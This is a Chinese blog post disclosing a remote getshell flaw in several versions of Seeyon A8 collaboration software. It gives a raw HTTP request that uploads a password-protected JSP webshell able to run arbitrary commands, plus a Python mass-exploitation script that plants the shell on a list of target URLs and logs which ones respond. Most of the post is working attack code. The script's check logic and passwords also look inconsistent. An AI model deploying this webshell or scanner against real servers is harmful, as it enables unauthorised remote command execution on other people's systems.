漏洞影响产品版本:

  • 致远A8-V5协同管理软件 V6.1sp1
  • 致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3
  • 致远A8+协同管理软件V7.1

漏洞情况:

访问/seeyon/htmlofficeservlet出现DBSTEP V3.0 0 21 0 htmoffice operate err'''

POST包:

POST /seeyon/htmlofficeservlet HTTP/1.1

  Content-Length: 1121

  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

  Host: xxxxxxxxx

  Pragma: no-cache

   
  DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV

  OPTION=S3WYOSWLBSGr

  currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66

  CREATEDATE=wUghPB3szB3Xwg66

  RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6

  originalFileId=wV66

  originalCreateDate=wUghPB3szB3Xwg66

  FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6

  needReadFile=yRWZdAS6

  originalCreateDate=wLSGP4oEzLKAz4=iz=66

  <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce

响应包:

DBSTEP V3.0 386 0 666 DBSTEP=OKMLlKlV

  OPTION=S3WYOSWLBSGr

  currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66

  CREATEDATE=wUghPB3szB3Xwg66

  RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6

  originalFileId=wV66

  originalCreateDate=wUghPB3szB3Xwg66

  FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6

  needReadFile=yRWZdAS6

  originalCreateDate=wLSGP4oEzLKAz4=iz=66

  CLIENTIP=wLCXqUKAP7uhw4g5zi=6

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>
致远OA系统多版本Getshell – 附批量检测Poc-Ti0s's Blog
致远OA系统多版本Getshell – 附批量检测Poc-Ti0s's Blog

批量检测 (Python)

# Wednesday, 26 June 2019
# Author:nianhua
# Blog:https://github.com/nian-hua/
 
import re
import requests
import base64
from multiprocessing import Pool, Manager
 
def send_payload(url):
 
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
 
    payload = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U="
 
    payload = base64.b64decode(payload)
 
    try:
 
        r = requests.post(url + '/seeyon/htmlofficeservlet', data=payload)
 
        r = requests.get(
            url + '/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+echo+wangming')
 
        if "wangming" in r.text:
 
            return 0
 
        else:
 
            return url
 
    except:
 
        return 0
 
def remove_control_chars(s):
    control_chars = ''.join(map(unichr, range(0,32) + range(127,160)))
     
    control_char_re = re.compile('[%s]' % re.escape(control_chars))
 
    s = control_char_re.sub('', s)
 
    if 'http' not in s:
 
        s = 'http://' + s
 
    return s
 
def savePeopleInformation(url, queue):
 
    newurl = send_payload(url)
 
    if newurl != 0:
 
        fw = open('loophole.txt', 'a')
        fw.write(newurl + '\n')
        fw.close()
 
    queue.put(url)
 
def main():
 
    pool = Pool(10)
 
    queue = Manager().Queue()
 
    fr = open('url.txt', 'r')
 
    lines = fr.readlines()
 
    for i in lines:
 
        url = remove_control_chars(i)
 
        pool.apply_async(savePeopleInformation, args=(url, queue,))
 
    allnum = len(lines)
 
    num = 0
 
    while True:
 
        print queue.get()
 
        num += 1
 
        if num >= allnum:
 
            fr.close()
 
            break
 
main()